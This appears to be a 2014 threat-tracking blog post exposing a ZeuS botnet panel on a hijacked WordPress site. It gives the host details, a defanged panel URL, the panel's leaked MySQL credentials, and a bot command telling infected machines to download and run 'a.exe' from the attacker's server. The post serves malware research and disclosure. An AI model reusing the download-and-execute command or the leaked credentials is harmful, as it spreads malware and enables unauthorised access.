Sunday, January 12, 2014

eyecatchersoptique.com - ZeuS 2.1.0.1

ZeuS 2.1.0.1 Botnet hosted on:
eyecatchersoptique.com
69.10.139.148
Linux server.ccommunity.com 2.6.18-194.26.1.el5

network:IP-Network-Block:69.10.139.144 - 69.10.139.151
network:Organization;I:ORG-CCommunitycom
network:Tech-Contact;I:noc@rackforce.com


panel:
hxxp://eyecatchersoptique.com/webstats/_stn/cp.php?m=login
Summary:
(144 bots)


Bots:
 OS Statistics


 TLD index is broken Wordpress





config.php

(144 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stn';


(0 bots)
public_html/images/.stnfrn/
#2
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stnfrn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stnfrn';

Script:
user_execute hxxp://eyecatchersoptique.com/webstats/_stn/server/a.exe

Moving to ZeuS 2.9.6.1

a.exe
https://www.virustotal.com/en/file/cac8ede4d09c2728f12421b6648da204e5a84561ebf3d9012fe39e0aa83a56fb/analysis/1389472180/

https://malwr.com/analysis/YjdiNThhZjc3MThmNGZmYmE3NmMwYThlNzZhMzdjYmY/


No comments:

Post a Comment